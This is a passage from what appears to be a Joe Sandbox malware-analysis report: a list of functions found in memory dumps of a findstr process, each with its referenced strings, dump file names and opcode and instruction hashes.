                            Function 02F7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                            Download Yara Rule
                            Strings
                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02FB7B7F
                            • RTL: Resource at %p, xrefs: 02FB7B8E
                            • RTL: Re-Waiting, xrefs: 02FB7BAC
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 0-871070163
                            • Opcode ID: 38534aa4171d87aec1de70f7082b7d1d1fb253d8cbf61e8aa6c01809e3f9133f
                            • Instruction ID: 2d48d9929a379c629eafbc509a3323eb6f92c464f537189e0225d18b86ac0bf1
                            • Opcode Fuzzy Hash: 38534aa4171d87aec1de70f7082b7d1d1fb253d8cbf61e8aa6c01809e3f9133f
                            • Instruction Fuzzy Hash: 5641D3327047029FD720DE25CC40BAAF7E6EF86794F100A1EEA56DB680DB31E5058F91
                            Function 02F7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                            Download Yara Rule
                            APIs
                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02FB728C
                            Strings
                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02FB7294
                            • RTL: Resource at %p, xrefs: 02FB72A3
                            • RTL: Re-Waiting, xrefs: 02FB72C1
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                            • API String ID: 885266447-605551621
                            • Opcode ID: 1a4354f3fbc416ad538e6db84ce5d742b6cf06cfa7a28ad2d51882295a9b916d
                            • Instruction ID: 252fab53c474429646705f6983251cc080fa57bb87518b44690848ab4f2dc14c
                            • Opcode Fuzzy Hash: 1a4354f3fbc416ad538e6db84ce5d742b6cf06cfa7a28ad2d51882295a9b916d
                            • Instruction Fuzzy Hash: D3410732B00246ABD711EE25CD41BA6F7A5FF95794F140619FB55E7280DB31E841CBD0
                            Function 02F87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: __aulldvrm
                            • String ID: +$-
                            • API String ID: 1302938615-2137968064
                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction ID: 982cf5030e74b2b8efe188a56dcb8a26dcaeb859998b72082ba7e68fcacfe992
                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                            • Instruction Fuzzy Hash: 2F91C679E0021A9BDF24FE6AC8807BEF7A5AF447E4F74451AEA55EB2C0D7309940CB50
                            Function 02F49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: $$@
                            • API String ID: 0-1194432280
                            • Opcode ID: dd50094f25c47a35dc4c5704e7d3b876b28c986b0fbd6664298d33e1caea3448
                            • Instruction ID: 3ae24f5ebde0846f8bc958911dbc3b211a9da7cf4b722fd2b06149679be6998e
                            • Opcode Fuzzy Hash: dd50094f25c47a35dc4c5704e7d3b876b28c986b0fbd6664298d33e1caea3448
                            • Instruction Fuzzy Hash: EB811EB1E012699BDB25DF54CC54BEEB7B8AF48754F0041EAEA19B7280D7705E84CFA0
                            Function 02FCCEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                            Download Yara Rule
                            APIs
                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 02FCCFBD
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3791579066.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: true
                            • Associated: 00000007.00000002.3791579066.0000000003039000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.000000000303D000.00000040.00001000.00020000.00000000.sdmpDownload File
                            • Associated: 00000007.00000002.3791579066.00000000030AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_2f10000_findstr.jbxd
                            Similarity
                            • API ID: CallFilterFunc@8
                            • String ID: @$@4_w@4_w
                            • API String ID: 4062629308-713214301
                            • Opcode ID: 0842cd98c3cf02429bb23e3fc5fef4484495a6f4892147b1333e73eda9aff2ac
                            • Instruction ID: 379969c52047e3f8f57865bda9e57990503dc6d6e3020aa4f37cec3b4fe71b35
                            • Opcode Fuzzy Hash: 0842cd98c3cf02429bb23e3fc5fef4484495a6f4892147b1333e73eda9aff2ac
                            • Instruction Fuzzy Hash: 4241BF71D00229DFCB21EF99C980A6EBBB9EF45B94F10406EEB14DB254E734D801CB64
                            Function 03302B38 Relevance: 5.0, Strings: 4, Instructions: 28COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.3792083516.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_3300000_findstr.jbxd
                            Similarity
                            • API ID:
                            • String ID: "5$7}1<$_ ib$ib!Y
                            • API String ID: 0-3399154490
                            • Opcode ID: 4beeb8cc7fad709d1e000d35246fbba4deb8ccaf8f72f4edc2e34c1891231e9c
                            • Instruction ID: 8ab31afa97292b586a782a17ffd8f7d369b905773f3e3b60fd4bbc3f923c23ba
                            • Opcode Fuzzy Hash: 4beeb8cc7fad709d1e000d35246fbba4deb8ccaf8f72f4edc2e34c1891231e9c
                            • Instruction Fuzzy Hash: 17F0A030118B888ADB08AB10C45865ABBD1FB8830CF440A9DE8C9EA191DA78C241C74A